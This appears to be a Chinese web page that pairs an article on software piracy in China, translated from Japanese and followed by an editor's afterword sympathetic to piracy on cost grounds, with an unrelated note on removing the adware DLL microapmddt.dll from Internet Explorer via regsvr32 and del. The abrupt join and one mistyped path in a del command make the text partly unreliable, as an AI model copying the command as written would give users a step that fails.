在这些小城市以外的农村,人们的月平均收入在3000日元以下(200元人民币),因为培养孩子而购买电脑简直就是天方夜谈。去年Lenovo为了低收入家庭而推出的超低价PC“家悦新梦”,也就是号称“农村专用台式机”的2999元PC,不过即使是这样的电脑,也超过这些地方人们的年收入以上。

在这样的小村庄也有PC机器的广告,是中国最大的Lenovo公司。上图中应该是之前做过大力宣传推广的联想“圆梦”2999元台式机。

被盗版问题困饶的中国
在了解了中国PC市场的现状以后,我们就一起来看看目前中国IT业所面临最严重的问题——盗版问题。说到中国的盗版软件发展起来应该还是在Windows 95的全盛时代,当时中国出现了添加了某些补丁程序包或者添加了IE4.0程序的所谓的Windows 96和Windows 97这样软件在软件店进行销售。即使到了今天,尽管微软一再呼吁要使用正版的操作系统才能得到微软的良好服务,但是谁也不能否定微软的这些服务会不会被中国的盗版商加入进去做成Windows XP2或者Windows 2005这样的可能性吧。

windows97正式版

随处可见贩卖盗版碟的摊铺

为什么盗版软件会如此的猖獗呢?因为贩卖盗版软件的小店实在是太多了,任何人都可以很简单的买到。在这样的状况下,买便宜的盗版产品几乎就成了理所当然的事情。而且,盗版软件的价格十分便宜,如果一台PC机器的软件全部使用正版的话,恐怕需要几个月的工资,可以吃上800顿饭左右的钱。因此,恐怕很多人根本连动过买正版软件的念头都没有。

为什么中国人可以花很大的价钱去买台电脑,在盗版软件店所陈列的强大软件阵容上应该就可以找到一些答案。在那里,有日本、欧洲、美国、韩国以及中国自身的几乎所有游戏软件,还有各种商业应用软件,应有尽有。而且,还有MP3音乐的CD光盘以及大量的DVD电影。但是对于Linux这样的非主流,只有 Linux操作系统,上面可以用的软件几乎就没有。

当然,中国也是有销售正规软件的店铺的,而且这些店铺也针对盗版的过分泛滥采取过一些行动。根据中国IT媒体的报道,中国最大的PC软件连锁店“连邦”就曾经开展过用手中的盗版软件,加上非常低廉的价格换取正版软件的“3.15盗版换正版”活动。不过,那些价格在200日元左右(15元人民币)的廉价正版软件大多数是工具集,很多用户认为能够兑换到的软件对他们来说并没有什么吸引力,因此这样的活动最后并没有取得什么实质性的成果。在很多中国的大城市里面进行了6天的活动,总共才收回了大约1000张盗版软件。

如果有一天,盗版从中国完全消失
我们可以试想一下如果盗版软件从中国完全消失的话会是怎样的光景呢?就目前的状况来看,只要使用PC的地方,那些行业就会使用盗版软件,如果真的盗版全部消失的话,情况可想而知。就操作系统而言,使用正版Windows XP的场合下,一台PC的上的投资基本上是两个小店工作人员的工资。稍微进到内陆地区的贫困地区的话,这样的价钱几乎就是4-5个人的月收入了。

目前中国使用盗版软件的比率是92%,而且渗透到了很多正规的公司中,情况十分严重。因为工作的话,办公软件是少不了的,盗版软件中比较有人气的 Microsoft Office的正版约为4万日元(3000元人民币),基本上如果每台PC都使用的话,需要每台花费4个人的月工资。不仅仅是在大企业,一些进行打印服务以及名片印刷等简易商务工作的小店铺中也在广泛使用。这些个人运营的小店铺,每月的营业收入大概也就1万日元稍多一点(800元人民币)。如果这样的小商铺尝试使用正版软件的话,那么Windows XP和Microsoft office加起来将近7万日元(5300元人民币)的投资规模对他们来说真的是伟大的事情了。

大约相当于7个月工资的花费,对于月收入在30万日元左右(23000元人民币)的日本人来说,等于为了一个在小规模的个人商店要增加210万日元(16 万元人民币)的初期投资,还仅仅是一台PC所使用的软件的价格。对于一个超级市场来说,如果使用3台这样的PC作为收款机的话,就要花费630万日元(48万人民币),这样的事情简直就是天方夜谈了。在中国路边的照相馆中,现在也都是使用数码相机进行拍照,加工编辑后进行打印了。在小店工作的人员有2 -3个人,所使用的软件基本没有GIMP这样的免费软件,而都是Adobe的Photoshop。

这样的小店初期需要投资的软件为Windows XP和PhotoShop,如果全部使用正版软件的话,花费基本要超过一个员工一年的工资。一个装饰稍好的照相馆中拥有4台PC,分别进行数码相机照片的处理以及证件照片的处理。如果这些机器的软件全部换做正版的话,差不多等于4个员工的年收入。对于日本人的感觉,差不多就是超过1000万日元以上(76 万元人民币)的大型投资了。

下面再一起来看看网吧的情况,微软曾经多次就网吧使用盗版软件的情况在中国提起过诉讼,但是好象没有什么效果。在网吧中,所使用的操作系统是相当于员工2 个月工资的Windows XP。根据调查,中国约有10万家网吧,每个网吧至少有20-30台PC,这样算下来,这么多的网吧如果全部使用微软的正版操作系统的话,将会是一个庞大的天文数字了。最近拥有多达750台电脑的大型网吧陆续开张。这种规模仅初期投资就要相当于1500个人工的费用,金额为3000万元人民币,也就是说1 个月要花费相当于雇佣1500个员工的费用,在日本若按每人每月工资30万日圆计算,则约为4亿5千万日元了。

一旦盗版软件“真正无法使用”的那天到来,不仅是中国,所有普遍使用盗版软件的国家将有很多企业面临倒闭,甚至还有可能引起物价上涨。由此看来,如此依赖盗版软件生存的社会,想要让他们改变到正版的道路上来几乎是不可能的。如果真的施加压力强制其国家对这样的状态负责,严厉要求民众使用正版软件,恐怕会有欲速则不达,穷鼠反噬猫的激烈反弹效果,中国这样巨大的市场,究竟应该怎样面对IT行业发展中所存在的如此严峻的问题,能否实现胜利大逃亡,我们真的需要拭目以待了。

后记:到底是谁逼着我们用盗版?

从日文网站编译的内容到这里就结束了。当回头看看编辑整理过的这些内容,我们应该做何感想呢?如果将全文进行一个浓缩的话,大概的观点如下:

● 中国PC软件盗版情况严重(92%),不过日本也不是没有(29%)

● 经济收入差别是造成中国盗版猖獗的直接原因

● PC用户对于微软操作系统、办公软件已经产生强烈的使用习惯

● 如何能妥善的处理好盗版问题,对中国政府是一个挑战

抛开民族情绪来讲,编辑个人认为日本媒体对于中国盗版问题的看法和分析还是比较中立、客观的。中国大城市居民平均工资3000多元,相同情况的日本居民则有22800元左右的工资,一套3000元左右的微软办公软件,对我们来说要用一个月的工资,而对日本居民来说只是工资的1/7,不是我们不想买,而是相对目前的国人经济能力来说实在是太贵了。

从统计表中我们看到,如果全安装正版软件的话,一台普通的家用个人电脑将有60%左右的成本来自软件,而其中微软的Office软件占了大部分支出。也许有人说花钱的话我就不买微软Office了,但现阶段谁家的机器里面没有Microsoft Word呢?

清除讨厌的浏览器插件

这月不知道装个什么软件的时候,被捆绑了恶意插件.

只要使用IE,大约每分钟都会自动弹出来一次广告,

刚开始以为是网通在路由上加的广告,应为frame的页面ip是河南网通的.

过了一段发现越来严重了,经常IE不能打开新窗口,并出现假死现象.

用HijackThis查看加载的启动项,发现唯一一个可疑的未知程序microapmddt.dll.

在google搜了下,发现的确是一个恶意广告程序.

将其清除:

过程:

regSvr32.exe /u C:\WINNT\system32\microapmddt.dll

首先,卸载该控件在注册表中的注册,不然只删除文件,下次启动系统时还是会去尝试加载它,

并会提示,找不到microapmddt.dll

del C:\WINNT\system32\microapmddt.dll /s /a
C:\WINNT\system32\microapmddt.dll
拒绝访问。

(必须关闭所有IE窗口)

再次del,

del C:\WINNT\system32microapmddt.dll /s /a
删除文件 – C:\WINNT\system32\microapmddt.dll

文件以删除

 XP 的系统 请将 WINNT 改为 WINDOWS

再次使用IE,确认一切正常!